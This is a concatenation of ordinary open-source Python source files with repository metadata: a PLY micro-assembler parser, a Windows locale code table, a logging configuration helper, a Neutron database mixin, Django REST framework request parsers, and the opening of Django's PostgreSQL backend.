def t_params_PARAMS(t):
r'([^\n;\\]|(\\[\n;\\]))+'
t.lineno += t.value.count('\n')
unescapeParamsRE = re.compile(r'(\\[\n;\\])')
def unescapeParams(mo):
val = mo.group(0)
return val[1]
t.value = unescapeParamsRE.sub(unescapeParams, t.value)
t.lexer.begin('asm')
return t
# An "ID" in the micro assembler is either a label, directive, or mnemonic
# If it's either a directive or a mnemonic, it will be optionally followed by
# parameters. If it's a label, the following colon will make the lexer stop
# looking for parameters.
def t_asm_ID(t):
r'[A-Za-z_]\w*'
t.type = reserved_map.get(t.value, 'ID')
# If the ID is really "extern", we shouldn't start looking for parameters
# yet. The real ID, the label itself, is coming up.
if t.type != 'EXTERN':
t.lexer.begin('params')
return t
# If there is a label and you're -not- in the assembler (which would be caught
# above), don't start looking for parameters.
def t_ANY_ID(t):
r'[A-Za-z_]\w*'
t.type = reserved_map.get(t.value, 'ID')
return t
# Braces enter and exit micro assembly
def t_INITIAL_LBRACE(t):
r'\{'
t.lexer.begin('asm')
return t
def t_asm_RBRACE(t):
r'\}'
t.lexer.begin('INITIAL')
return t
# At the top level, keep track of newlines only for line counting.
def t_INITIAL_NEWLINE(t):
r'\n+'
t.lineno += t.value.count('\n')
# In the micro assembler, do line counting but also return a token. The
# token is needed by the parser to detect the end of a statement.
def t_asm_NEWLINE(t):
r'\n+'
t.lineno += t.value.count('\n')
return t
# A newline or semicolon when looking for params signals that the statement
# is over and the lexer should go back to looking for regular assembly.
def t_params_NEWLINE(t):
r'\n+'
t.lineno += t.value.count('\n')
t.lexer.begin('asm')
return t
def t_params_SEMI(t):
r';'
t.lexer.begin('asm')
return t
# Basic regular expressions to pick out simple tokens
t_ANY_LPAREN = r'\('
t_ANY_RPAREN = r'\)'
t_ANY_SEMI = r';'
t_ANY_DOT = r'\.'
t_ANY_ignore = ' \t\x0c'
def t_ANY_error(t):
error(t.lineno, "illegal character '%s'" % t.value[0])
t.skip(1)
##########################################################################
#
# Parser specification
#
##########################################################################
# Start symbol for a file which may have more than one macroop or rom
# specification.
def p_file(t):
'file : opt_rom_or_macros'
def p_opt_rom_or_macros_0(t):
'opt_rom_or_macros : '
def p_opt_rom_or_macros_1(t):
'opt_rom_or_macros : rom_or_macros'
def p_rom_or_macros_0(t):
'rom_or_macros : rom_or_macro'
def p_rom_or_macros_1(t):
'rom_or_macros : rom_or_macros rom_or_macro'
def p_rom_or_macro_0(t):
'''rom_or_macro : rom_block
| macroop_def'''
# Defines a section of microcode that should go in the current ROM
def p_rom_block(t):
'rom_block : DEF ROM block SEMI'
if not t.parser.rom:
print_error("Rom block found, but no Rom object specified.")
raise TypeError, "Rom block found, but no Rom object was specified."
for statement in t[3].statements:
handle_statement(t.parser, t.parser.rom, statement)
t[0] = t.parser.rom
# Defines a macroop that jumps to an external label in the ROM
def p_macroop_def_0(t):
'macroop_def : DEF MACROOP ID LPAREN ID RPAREN SEMI'
if not t.parser.rom_macroop_type:
print_error("ROM based macroop found, but no ROM macroop class was specified.")
raise TypeError, "ROM based macroop found, but no ROM macroop class was specified."
macroop = t.parser.rom_macroop_type(t[3], t[5])
t.parser.macroops[t[3]] = macroop
# Defines a macroop that is combinationally generated
def p_macroop_def_1(t):
'macroop_def : DEF MACROOP ID block SEMI'
try:
curop = t.parser.macro_type(t[3])
except TypeError:
print_error("Error creating macroop object.")
raise
for statement in t[4].statements:
handle_statement(t.parser, curop, statement)
t.parser.macroops[t[3]] = curop
# A block of statements
def p_block(t):
'block : LBRACE statements RBRACE'
block = Block()
block.statements = t[2]
t[0] = block
def p_statements_0(t):
'statements : statement'
if t[1]:
t[0] = [t[1]]
else:
t[0] = []
def p_statements_1(t):
'statements : statements statement'
if t[2]:
t[1].append(t[2])
t[0] = t[1]
def p_statement(t):
'statement : content_of_statement end_of_statement'
t[0] = t[1]
# A statement can be a microop or an assembler directive
def p_content_of_statement_0(t):
'''content_of_statement : microop
| directive'''
t[0] = t[1]
# Ignore empty statements
def p_content_of_statement_1(t):
'content_of_statement : '
pass
# Statements are ended by newlines or a semicolon
def p_end_of_statement(t):
'''end_of_statement : NEWLINE
| SEMI'''
pass
# Different flavors of microop to avoid shift/reduce errors
def p_microop_0(t):
'microop : labels ID'
microop = Microop()
microop.labels = t[1]
microop.mnemonic = t[2]
t[0] = microop
def p_microop_1(t):
'microop : ID'
microop = Microop()
microop.mnemonic = t[1]
t[0] = microop
def p_microop_2(t):
'microop : labels ID PARAMS'
microop = Microop()
microop.labels = t[1]
microop.mnemonic = t[2]
microop.params = t[3]
t[0] = microop
def p_microop_3(t):
'microop : ID PARAMS'
microop = Microop()
microop.mnemonic = t[1]
microop.params = t[2]
t[0] = microop
# Labels in the microcode
def p_labels_0(t):
'labels : label'
t[0] = [t[1]]
def p_labels_1(t):
'labels : labels label'
t[1].append(t[2])
t[0] = t[1]
# labels on lines by themselves are attached to the following instruction.
def p_labels_2(t):
'labels : labels NEWLINE'
t[0] = t[1]
def p_label_0(t):
'label : ID COLON'
label = Label()
label.is_extern = False
label.text = t[1]
t[0] = label
def p_label_1(t):
'label : EXTERN ID COLON'
label = Label()
label.is_extern = True
label.text = t[2]
t[0] = label
# Directives for the macroop
def p_directive_0(t):
'directive : DOT ID'
directive = Directive()
directive.name = t[2]
t[0] = directive
def p_directive_1(t):
'directive : DOT ID PARAMS'
directive = Directive()
directive.name = t[2]
directive.params = t[3]
t[0] = directive
# Parse error handler. Note that the argument here is the offending
# *token*, not a grammar symbol (hence the need to use t.value)
def p_error(t):
if t:
error(t.lineno, "syntax error at '%s'" % t.value)
else:
error(0, "unknown syntax error", True)
class MicroAssembler(object):
def __init__(self, macro_type, microops,
rom = None, rom_macroop_type = None):
self.lexer = lex.lex()
self.parser = yacc.yacc()
self.parser.macro_type = macro_type
self.parser.macroops = {}
self.parser.microops = microops
self.parser.rom = rom
self.parser.rom_macroop_type = rom_macroop_type
self.parser.symbols = {}
self.symbols = self.parser.symbols
def assemble(self, asm):
self.parser.parse(asm, lexer=self.lexer)
macroops = self.parser.macroops
self.parser.macroops = {}
return macroops
| bsd-3-clause | 7,010,432,845,688,307,000 | 28.448 | 91 | 0.599022 | false |
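# Minimal, hedged sketch of how the MicroAssembler defined above is typically
# driven (not part of the original file).  An ISA description normally supplies
# the macroop class and the microop dictionary; MyMacroop and Mov below are
# invented stand-ins, and the microcode text is a toy example.
class MyMacroop(Combinational_Macroop):
    pass
class Mov(object):
    # A real microop class would encode operands; this one just stores them.
    def __init__(self, *args):
        self.args = args
assembler = MicroAssembler(MyMacroop, {'mov': Mov})
# assemble() returns a dict mapping macroop names to macroop objects.
macroops = assembler.assemble("def macroop MOV_R_R { mov 1, 2; };")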
UweFleis3/Uwe | py/openage/convert/hardcoded/langcodes.py | 46 | 8618 | # language codes, as used in PE file ressources
# this file is used by pefile.py
langcodes = {
1: 'ar',
2: 'bg',
3: 'ca',
4: 'zh_Hans',
5: 'cs',
6: 'da',
7: 'de',
8: 'el',
9: 'en',
10: 'es',
11: 'fi',
12: 'fr',
13: 'he',
14: 'hu',
15: 'is',
16: 'it',
17: 'ja',
18: 'ko',
19: 'nl',
20: 'no',
21: 'pl',
22: 'pt',
23: 'rm',
24: 'ro',
25: 'ru',
26: 'bs',
27: 'sk',
28: 'sq',
29: 'sv',
30: 'th',
31: 'tr',
32: 'ur',
33: 'id',
34: 'uk',
35: 'be',
36: 'sl',
37: 'et',
38: 'lv',
39: 'lt',
40: 'tg',
41: 'fa',
42: 'vi',
43: 'hy',
44: 'az',
45: 'eu',
46: 'dsb',
47: 'mk',
48: 'st',
49: 'ts',
50: 'tn',
51: 've',
52: 'xh',
53: 'zu',
54: 'af',
55: 'ka',
56: 'fo',
57: 'hi',
58: 'mt',
59: 'se',
60: 'ga',
61: 'yi',
62: 'ms',
63: 'kk',
64: 'ky',
65: 'sw',
66: 'tk',
67: 'uz',
68: 'tt',
69: 'bn',
70: 'pa',
71: 'gu',
72: 'or',
73: 'ta',
74: 'te',
75: 'kn',
76: 'ml',
77: 'as',
78: 'mr',
79: 'sa',
80: 'mn',
81: 'bo',
82: 'cy',
83: 'km',
84: 'lo',
85: 'my',
86: 'gl',
87: 'kok',
88: 'mni',
89: 'sd',
90: 'syr',
91: 'si',
92: 'chr',
93: 'iu',
94: 'am',
95: 'tzm',
96: 'ks',
97: 'ne',
98: 'fy',
99: 'ps',
100: 'fil',
101: 'dv',
102: 'bin',
103: 'ff',
104: 'ha',
105: 'ibb',
106: 'yo',
107: 'quz',
108: 'nso',
109: 'ba',
110: 'lb',
111: 'kl',
112: 'ig',
113: 'kr',
114: 'om',
115: 'ti',
116: 'gn',
117: 'haw',
118: 'la',
119: 'so',
120: 'ii',
121: 'pap',
122: 'arn',
124: 'moh',
126: 'br',
128: 'ug',
129: 'mi',
130: 'oc',
131: 'co',
132: 'gsw',
133: 'sah',
134: 'qut',
135: 'rw',
136: 'wo',
140: 'prs',
145: 'gd',
146: 'ku',
1025: 'ar_SA',
1026: 'bg_BG',
1027: 'ca_ES',
1028: 'zh_TW',
1029: 'cs_CZ',
1030: 'da_DK',
1031: 'de_DE',
1032: 'el_GR',
1033: 'en_US',
1034: 'es_ES_tradnl',
1035: 'fi_FI',
1036: 'fr_FR',
1037: 'he_IL',
1038: 'hu_HU',
1039: 'is_IS',
1040: 'it_IT',
1041: 'ja_JP',
1042: 'ko_KR',
1043: 'nl_NL',
1044: 'nb_NO',
1045: 'pl_PL',
1046: 'pt_BR',
1047: 'rm_CH',
1048: 'ro_RO',
1049: 'ru_RU',
1050: 'hr_HR',
1051: 'sk_SK',
1052: 'sq_AL',
1053: 'sv_SE',
1054: 'th_TH',
1055: 'tr_TR',
1056: 'ur_PK',
1057: 'id_ID',
1058: 'uk_UA',
1059: 'be_BY',
1060: 'sl_SI',
1061: 'et_EE',
1062: 'lv_LV',
1063: 'lt_LT',
1064: 'tg_Cyrl_TJ',
1065: 'fa_IR',
1066: 'vi_VN',
1067: 'hy_AM',
1068: 'az_Latn_AZ',
1069: 'eu_ES',
1070: 'hsb_DE',
1071: 'mk_MK',
1072: 'st_ZA',
1073: 'ts_ZA',
1074: 'tn_ZA',
1075: 've_ZA',
1076: 'xh_ZA',
1077: 'zu_ZA',
1078: 'af_ZA',
1079: 'ka_GE',
1080: 'fo_FO',
1081: 'hi_IN',
1082: 'mt_MT',
1083: 'se_NO',
1085: 'yi_Hebr',
1086: 'ms_MY',
1087: 'kk_KZ',
1088: 'ky_KG',
1089: 'sw_KE',
1090: 'tk_TM',
1091: 'uz_Latn_UZ',
1092: 'tt_RU',
1093: 'bn_IN',
1094: 'pa_IN',
1095: 'gu_IN',
1096: 'or_IN',
1097: 'ta_IN',
1098: 'te_IN',
1099: 'kn_IN',
1100: 'ml_IN',
1101: 'as_IN',
1102: 'mr_IN',
1103: 'sa_IN',
1104: 'mn_MN',
1105: 'bo_CN',
1106: 'cy_GB',
1107: 'km_KH',
1108: 'lo_LA',
1109: 'my_MM',
1110: 'gl_ES',
1111: 'kok_IN',
1112: 'mni_IN',
1113: 'sd_Deva_IN',
1114: 'syr_SY',
1115: 'si_LK',
1116: 'chr_Cher_US',
1117: 'iu_Cans_CA',
1118: 'am_ET',
1119: 'tzm_Arab_MA',
1120: 'ks_Arab',
1121: 'ne_NP',
1122: 'fy_NL',
1123: 'ps_AF',
1124: 'fil_PH',
1125: 'dv_MV',
1126: 'bin_NG',
1127: 'fuv_NG',
1128: 'ha_Latn_NG',
1129: 'ibb_NG',
1130: 'yo_NG',
1131: 'quz_BO',
1132: 'nso_ZA',
1133: 'ba_RU',
1134: 'lb_LU',
1135: 'kl_GL',
1136: 'ig_NG',
1137: 'kr_NG',
1138: 'om_ET',
1139: 'ti_ET',
1140: 'gn_PY',
1141: 'haw_US',
1142: 'la_Latn',
1143: 'so_SO',
1144: 'ii_CN',
1145: 'pap_029',
1146: 'arn_CL',
1148: 'moh_CA',
1150: 'br_FR',
1152: 'ug_CN',
1153: 'mi_NZ',
1154: 'oc_FR',
1155: 'co_FR',
1156: 'gsw_FR',
1157: 'sah_RU',
1158: 'qut_GT',
1159: 'rw_RW',
1160: 'wo_SN',
1164: 'prs_AF',
1165: 'plt_MG',
1166: 'zh_yue_HK',
1167: 'tdd_Tale_CN',
1168: 'khb_Talu_CN',
1169: 'gd_GB',
1170: 'ku_Arab_IQ',
1171: 'quc_CO',
1281: 'qps_ploc',
1534: 'qps_ploca',
2049: 'ar_IQ',
2051: 'ca_ES_valencia',
2052: 'zh_CN',
2055: 'de_CH',
2057: 'en_GB',
2058: 'es_MX',
2060: 'fr_BE',
2064: 'it_CH',
2065: 'ja_Ploc_JP',
2067: 'nl_BE',
2068: 'nn_NO',
2070: 'pt_PT',
2072: 'ro_MD',
2073: 'ru_MD',
2074: 'sr_Latn_CS',
2077: 'sv_FI',
2080: 'ur_IN',
2092: 'az_Cyrl_AZ',
2094: 'dsb_DE',
2098: 'tn_BW',
2107: 'se_SE',
2108: 'ga_IE',
2110: 'ms_BN',
2115: 'uz_Cyrl_UZ',
2117: 'bn_BD',
2118: 'pa_Arab_PK',
2121: 'ta_LK',
2128: 'mn_Mong_CN',
2129: 'bo_BT',
2137: 'sd_Arab_PK',
2141: 'iu_Latn_CA',
2143: 'tzm_Latn_DZ',
2144: 'ks_Deva',
2145: 'ne_IN',
2151: 'ff_Latn_SN',
2155: 'quz_EC',
2163: 'ti_ER',
2559: 'qps_plocm',
3073: 'ar_EG',
3076: 'zh_HK',
3079: 'de_AT',
3081: 'en_AU',
3082: 'es_ES',
3084: 'fr_CA',
3098: 'sr_Cyrl_CS',
3131: 'se_FI',
3152: 'mn_Mong_MN',
3167: 'tmz_MA',
3179: 'quz_PE',
4097: 'ar_LY',
4100: 'zh_SG',
4103: 'de_LU',
4105: 'en_CA',
4106: 'es_GT',
4108: 'fr_CH',
4122: 'hr_BA',
4155: 'smj_NO',
4191: 'tzm_Tfng_MA',
5121: 'ar_DZ',
5124: 'zh_MO',
5127: 'de_LI',
5129: 'en_NZ',
5130: 'es_CR',
5132: 'fr_LU',
5146: 'bs_Latn_BA',
5179: 'smj_SE',
6145: 'ar_MA',
6153: 'en_IE',
6154: 'es_PA',
6156: 'fr_MC',
6170: 'sr_Latn_BA',
6203: 'sma_NO',
7169: 'ar_TN',
7177: 'en_ZA',
7178: 'es_DO',
7194: 'sr_Cyrl_BA',
7227: 'sma_SE',
8193: 'ar_OM',
8201: 'en_JM',
8202: 'es_VE',
8204: 'fr_RE',
8218: 'bs_Cyrl_BA',
8251: 'sms_FI',
9217: 'ar_YE',
9225: 'en_029',
9226: 'es_CO',
9228: 'fr_CD',
9242: 'sr_Latn_RS',
9275: 'smn_FI',
10241: 'ar_SY',
10249: 'en_BZ',
10250: 'es_PE',
10252: 'fr_SN',
10266: 'sr_Cyrl_RS',
11265: 'ar_JO',
11273: 'en_TT',
11274: 'es_AR',
11276: 'fr_CM',
11290: 'sr_Latn_ME',
12289: 'ar_LB',
12297: 'en_ZW',
12298: 'es_EC',
12300: 'fr_CI',
12314: 'sr_Cyrl_ME',
13313: 'ar_KW',
13321: 'en_PH',
13322: 'es_CL',
13324: 'fr_ML',
14337: 'ar_AE',
14345: 'en_ID',
14346: 'es_UY',
14348: 'fr_MA',
15361: 'ar_BH',
15369: 'en_HK',
15370: 'es_PY',
15372: 'fr_HT',
16385: 'ar_QA',
16393: 'en_IN',
16394: 'es_BO',
17409: 'ar_Ploc_SA',
17417: 'en_MY',
17418: 'es_SV',
18433: 'ar_145',
18441: 'en_SG',
18442: 'es_HN',
19465: 'en_AE',
19466: 'es_NI',
20489: 'en_BH',
20490: 'es_PR',
21513: 'en_EG',
21514: 'es_US',
22537: 'en_JO',
22538: 'es_419',
23561: 'en_KW',
24585: 'en_TR',
25609: 'en_YE',
25626: 'bs_Cyrl',
26650: 'bs_Latn',
27674: 'sr_Cyrl',
28698: 'sr_Latn',
28731: 'smn',
29740: 'az_Cyrl',
29755: 'sms',
30724: 'zh',
30740: 'nn',
30746: 'bs',
30764: 'az_Latn',
30779: 'sma',
30787: 'uz_Cyrl',
30800: 'mn_Cyrl',
30813: 'iu_Cans',
30815: 'tzm_Tfng',
31748: 'zh_Hant',
31764: 'nb',
31770: 'sr',
31784: 'tg_Cyrl',
31790: 'dsb',
31803: 'smj',
31811: 'uz_Latn',
31814: 'pa_Arab',
31824: 'mn_Mong',
31833: 'sd_Arab',
31836: 'chr_Cher',
31837: 'iu_Latn',
31839: 'tzm_Latn',
31847: 'ff_Latn',
31848: 'ha_Latn',
31890: 'ku_Arab',
65663: 'x_IV_mathan',
66567: 'de_DE_phoneb',
66574: 'hu_HU_tchncl',
66615: 'ka_GE_modern',
133124: 'zh_CN_stroke',
135172: 'zh_SG_stroke',
136196: 'zh_MO_stroke',
197636: 'zh_TW_pronun',
263172: 'zh_TW_radstr',
263185: 'ja_JP_radstr',
265220: 'zh_HK_radstr',
267268: 'zh_MO_radstr'}
| gpl-3.0 | -3,913,281,910,808,396,000 | 17.65368 | 47 | 0.423648 | false |
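# Tiny usage sketch (not part of the original file): pefile reports the
# language of a PE resource entry as an integer id, and this table turns it
# into a locale string.  The id below is just an example value.
lang_id = 1033
locale = langcodes.get(lang_id, 'unknown')  # -> 'en_US'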
rue89-tech/edx-analytics-dashboard | analytics_dashboard/settings/logger.py | 4 | 3377 | """Logging configuration"""
import os
import platform
import sys
from logging.handlers import SysLogHandler
def get_logger_config(log_dir='/var/tmp',
logging_env="no_env",
edx_filename="edx.log",
dev_env=False,
debug=False,
local_loglevel='INFO',
service_variant='insights'):
"""
Return the appropriate logging config dictionary. You should assign the
result of this to the LOGGING var in your settings.
    If dev_env is set to true, logging will not be done via the local rsyslogd;
    instead, application logs will be dropped in log_dir.
"edx_filename" is ignored unless dev_env is set to true since otherwise logging is handled by rsyslogd.
"""
# Revert to INFO if an invalid string is passed in
if local_loglevel not in ['DEBUG', 'INFO', 'WARNING', 'ERROR', 'CRITICAL']:
local_loglevel = 'INFO'
hostname = platform.node().split(".")[0]
syslog_format = ("[service_variant={service_variant}]"
"[%(name)s][env:{logging_env}] %(levelname)s "
"[{hostname} %(process)d] [%(filename)s:%(lineno)d] "
"- %(message)s").format(
service_variant=service_variant,
logging_env=logging_env, hostname=hostname)
if debug:
handlers = ['console']
else:
handlers = ['local']
logger_config = {
'version': 1,
'disable_existing_loggers': False,
'formatters': {
'standard': {
'format': '%(asctime)s %(levelname)s %(process)d '
'[%(name)s] %(filename)s:%(lineno)d - %(message)s',
},
'syslog_format': {'format': syslog_format},
'raw': {'format': '%(message)s'},
},
'handlers': {
'console': {
'level': 'DEBUG' if debug else 'INFO',
'class': 'logging.StreamHandler',
'formatter': 'standard',
'stream': sys.stdout,
},
},
'loggers': {
'django': {
'handlers': handlers,
'propagate': True,
'level': 'INFO'
},
'': {
'handlers': handlers,
'level': 'DEBUG',
'propagate': False
},
}
}
if dev_env:
edx_file_loc = os.path.join(log_dir, edx_filename)
logger_config['handlers'].update({
'local': {
'class': 'logging.handlers.RotatingFileHandler',
'level': local_loglevel,
'formatter': 'standard',
'filename': edx_file_loc,
'maxBytes': 1024 * 1024 * 2,
'backupCount': 5,
},
})
else:
logger_config['handlers'].update({
'local': {
'level': local_loglevel,
'class': 'logging.handlers.SysLogHandler',
# Use a different address for Mac OS X
'address': '/var/run/syslog' if sys.platform == "darwin" else '/dev/log',
'formatter': 'syslog_format',
'facility': SysLogHandler.LOG_LOCAL0,
},
})
return logger_config
| agpl-3.0 | 8,683,102,707,940,834,000 | 31.471154 | 107 | 0.483269 | false |
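# Hedged usage sketch (not from the original module): as the docstring notes,
# the returned dict is meant to be assigned to LOGGING in a Django settings
# file.  The directory and environment names below are invented placeholders.
LOGGING = get_logger_config(
    log_dir='/var/tmp/insights',
    logging_env='dev',
    dev_env=True,
    debug=True,
    local_loglevel='DEBUG',
)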
rickerc/neutron_audit | neutron/db/routedserviceinsertion_db.py | 17 | 4553 | # vim: tabstop=4 shiftwidth=4 softtabstop=4
#
# Copyright 2013 VMware, Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
# @author: Kaiwei Fan, VMware, Inc
import sqlalchemy as sa
from sqlalchemy import event
from neutron.common import exceptions as qexception
from neutron.db import model_base
from neutron.extensions import routedserviceinsertion as rsi
class ServiceRouterBinding(model_base.BASEV2):
resource_id = sa.Column(sa.String(36),
primary_key=True)
resource_type = sa.Column(sa.String(36),
primary_key=True)
router_id = sa.Column(sa.String(36),
sa.ForeignKey('routers.id'),
nullable=False)
class AttributeException(qexception.NeutronException):
message = _("Resource type '%(resource_type)s' is longer "
"than %(maxlen)d characters")
@event.listens_for(ServiceRouterBinding.resource_type, 'set', retval=True)
def validate_resource_type(target, value, oldvalue, initiator):
"""Make sure the resource type fit the resource_type column."""
maxlen = ServiceRouterBinding.resource_type.property.columns[0].type.length
if len(value) > maxlen:
raise AttributeException(resource_type=value, maxlen=maxlen)
return value
class RoutedServiceInsertionDbMixin(object):
"""Mixin class to add router service insertion."""
def _process_create_resource_router_id(self, context, resource, model):
with context.session.begin(subtransactions=True):
db = ServiceRouterBinding(
resource_id=resource['id'],
resource_type=model.__tablename__,
router_id=resource[rsi.ROUTER_ID])
context.session.add(db)
return self._make_resource_router_id_dict(db, model)
def _extend_resource_router_id_dict(self, context, resource, model):
binding = self._get_resource_router_id_binding(
context, resource['resource_id'], model)
resource[rsi.ROUTER_ID] = binding['router_id']
def _get_resource_router_id_binding(self, context, model,
resource_id=None,
router_id=None):
query = self._model_query(context, ServiceRouterBinding)
query = query.filter(
ServiceRouterBinding.resource_type == model.__tablename__)
if resource_id:
query = query.filter(
ServiceRouterBinding.resource_id == resource_id)
if router_id:
query = query.filter(
ServiceRouterBinding.router_id == router_id)
return query.first()
def _get_resource_router_id_bindings(self, context, model,
resource_ids=None,
router_ids=None):
query = self._model_query(context, ServiceRouterBinding)
query = query.filter(
ServiceRouterBinding.resource_type == model.__tablename__)
if resource_ids:
query = query.filter(
ServiceRouterBinding.resource_id.in_(resource_ids))
if router_ids:
query = query.filter(
ServiceRouterBinding.router_id.in_(router_ids))
return query.all()
def _make_resource_router_id_dict(self, resource_router_binding, model,
fields=None):
resource = {'resource_id': resource_router_binding['resource_id'],
'resource_type': model.__tablename__,
rsi.ROUTER_ID: resource_router_binding[rsi.ROUTER_ID]}
return self._fields(resource, fields)
def _delete_resource_router_id_binding(self, context, resource_id, model):
with context.session.begin(subtransactions=True):
binding = self._get_resource_router_id_binding(
context, model, resource_id=resource_id)
if binding:
context.session.delete(binding)
| apache-2.0 | -8,073,803,098,463,642,000 | 41.157407 | 79 | 0.624863 | false |
iheitlager/django-rest-framework | rest_framework/parsers.py | 78 | 7968 | """
Parsers are used to parse the content of incoming HTTP requests.
They give us a generic way of being able to handle various media types
on the request, such as form content or json encoded data.
"""
from __future__ import unicode_literals
import json
from django.conf import settings
from django.core.files.uploadhandler import StopFutureHandlers
from django.http import QueryDict
from django.http.multipartparser import \
MultiPartParser as DjangoMultiPartParser
from django.http.multipartparser import (
ChunkIter, MultiPartParserError, parse_header
)
from django.utils import six
from django.utils.encoding import force_text
from django.utils.six.moves.urllib import parse as urlparse
from rest_framework import renderers
from rest_framework.exceptions import ParseError
class DataAndFiles(object):
def __init__(self, data, files):
self.data = data
self.files = files
class BaseParser(object):
"""
All parsers should extend `BaseParser`, specifying a `media_type`
attribute, and overriding the `.parse()` method.
"""
media_type = None
def parse(self, stream, media_type=None, parser_context=None):
"""
Given a stream to read from, return the parsed representation.
Should return parsed data, or a `DataAndFiles` object consisting of the
parsed data and files.
"""
raise NotImplementedError(".parse() must be overridden.")
class JSONParser(BaseParser):
"""
Parses JSON-serialized data.
"""
media_type = 'application/json'
renderer_class = renderers.JSONRenderer
def parse(self, stream, media_type=None, parser_context=None):
"""
Parses the incoming bytestream as JSON and returns the resulting data.
"""
parser_context = parser_context or {}
encoding = parser_context.get('encoding', settings.DEFAULT_CHARSET)
try:
data = stream.read().decode(encoding)
return json.loads(data)
except ValueError as exc:
raise ParseError('JSON parse error - %s' % six.text_type(exc))
class FormParser(BaseParser):
"""
Parser for form data.
"""
media_type = 'application/x-www-form-urlencoded'
def parse(self, stream, media_type=None, parser_context=None):
"""
Parses the incoming bytestream as a URL encoded form,
and returns the resulting QueryDict.
"""
parser_context = parser_context or {}
encoding = parser_context.get('encoding', settings.DEFAULT_CHARSET)
data = QueryDict(stream.read(), encoding=encoding)
return data
class MultiPartParser(BaseParser):
"""
Parser for multipart form data, which may include file data.
"""
media_type = 'multipart/form-data'
def parse(self, stream, media_type=None, parser_context=None):
"""
Parses the incoming bytestream as a multipart encoded form,
and returns a DataAndFiles object.
`.data` will be a `QueryDict` containing all the form parameters.
`.files` will be a `QueryDict` containing all the form files.
"""
parser_context = parser_context or {}
request = parser_context['request']
encoding = parser_context.get('encoding', settings.DEFAULT_CHARSET)
meta = request.META.copy()
meta['CONTENT_TYPE'] = media_type
upload_handlers = request.upload_handlers
try:
parser = DjangoMultiPartParser(meta, stream, upload_handlers, encoding)
data, files = parser.parse()
return DataAndFiles(data, files)
except MultiPartParserError as exc:
raise ParseError('Multipart form parse error - %s' % six.text_type(exc))
class FileUploadParser(BaseParser):
"""
Parser for file upload data.
"""
media_type = '*/*'
def parse(self, stream, media_type=None, parser_context=None):
"""
Treats the incoming bytestream as a raw file upload and returns
        a `DataAndFiles` object.
`.data` will be None (we expect request body to be a file content).
`.files` will be a `QueryDict` containing one 'file' element.
"""
parser_context = parser_context or {}
request = parser_context['request']
encoding = parser_context.get('encoding', settings.DEFAULT_CHARSET)
meta = request.META
upload_handlers = request.upload_handlers
filename = self.get_filename(stream, media_type, parser_context)
# Note that this code is extracted from Django's handling of
# file uploads in MultiPartParser.
content_type = meta.get('HTTP_CONTENT_TYPE',
meta.get('CONTENT_TYPE', ''))
try:
content_length = int(meta.get('HTTP_CONTENT_LENGTH',
meta.get('CONTENT_LENGTH', 0)))
except (ValueError, TypeError):
content_length = None
# See if the handler will want to take care of the parsing.
for handler in upload_handlers:
result = handler.handle_raw_input(None,
meta,
content_length,
None,
encoding)
if result is not None:
return DataAndFiles({}, {'file': result[1]})
# This is the standard case.
possible_sizes = [x.chunk_size for x in upload_handlers if x.chunk_size]
chunk_size = min([2 ** 31 - 4] + possible_sizes)
chunks = ChunkIter(stream, chunk_size)
counters = [0] * len(upload_handlers)
for index, handler in enumerate(upload_handlers):
try:
handler.new_file(None, filename, content_type,
content_length, encoding)
except StopFutureHandlers:
upload_handlers = upload_handlers[:index + 1]
break
for chunk in chunks:
for index, handler in enumerate(upload_handlers):
chunk_length = len(chunk)
chunk = handler.receive_data_chunk(chunk, counters[index])
counters[index] += chunk_length
if chunk is None:
break
for index, handler in enumerate(upload_handlers):
file_obj = handler.file_complete(counters[index])
if file_obj:
return DataAndFiles({}, {'file': file_obj})
raise ParseError("FileUpload parse error - "
"none of upload handlers can handle the stream")
def get_filename(self, stream, media_type, parser_context):
"""
Detects the uploaded file name. First searches a 'filename' url kwarg.
Then tries to parse Content-Disposition header.
"""
try:
return parser_context['kwargs']['filename']
except KeyError:
pass
try:
meta = parser_context['request'].META
disposition = parse_header(meta['HTTP_CONTENT_DISPOSITION'].encode('utf-8'))
filename_parm = disposition[1]
if 'filename*' in filename_parm:
return self.get_encoded_filename(filename_parm)
return force_text(filename_parm['filename'])
except (AttributeError, KeyError, ValueError):
pass
def get_encoded_filename(self, filename_parm):
"""
Handle encoded filenames per RFC6266. See also:
http://tools.ietf.org/html/rfc2231#section-4
"""
encoded_filename = force_text(filename_parm['filename*'])
try:
charset, lang, filename = encoded_filename.split('\'', 2)
filename = urlparse.unquote(filename)
except (ValueError, LookupError):
filename = force_text(filename_parm['filename'])
return filename
| bsd-2-clause | -8,359,600,898,694,691,000 | 34.891892 | 88 | 0.607555 | false |
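# Illustrative sketch (not part of the original module): parsers are usually
# invoked by the framework's request parsing machinery, but one can also be
# exercised directly by handing it a byte stream, assuming Django settings are
# already configured so that settings.DEFAULT_CHARSET is available.
import io
parser = JSONParser()
data = parser.parse(io.BytesIO(b'{"name": "example"}'))
# data == {'name': 'example'}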
cntnboys/410Lab6 | build/django/build/lib.linux-x86_64-2.7/django/db/backends/postgresql_psycopg2/base.py | 21 | 8837 | """
PostgreSQL database backend for Django.
Requires psycopg 2: http://initd.org/projects/psycopg2
"""
from django.conf import settings
from django.db.backends import (BaseDatabaseFeatures, BaseDatabaseWrapper,
BaseDatabaseValidation)
from django.db.backends.postgresql_psycopg2.operations import DatabaseOperations
from django.db.backends.postgresql_psycopg2.client import DatabaseClient
from django.db.backends.postgresql_psycopg2.creation import DatabaseCreation
from django.db.backends.postgresql_psycopg2.version import get_version
from django.db.backends.postgresql_psycopg2.introspection import DatabaseIntrospection
from django.db.backends.postgresql_psycopg2.schema import DatabaseSchemaEditor
from django.db.utils import InterfaceError
from django.utils.encoding import force_str
from django.utils.functional import cached_property
from django.utils.safestring import SafeText, SafeBytes
from django.utils.timezone import utc
try:
import psycopg2 as Database
import psycopg2.extensions
except ImportError as e:
from django.core.exceptions import ImproperlyConfigured
raise ImproperlyConfigured("Error loading psycopg2 module: %s" % e)
DatabaseError = Database.DatabaseError
IntegrityError = Database.IntegrityError
psycopg2.extensions.register_type(psycopg2.extensions.UNICODE)
psycopg2.extensions.register_type(psycopg2.extensions.UNICODEARRAY)
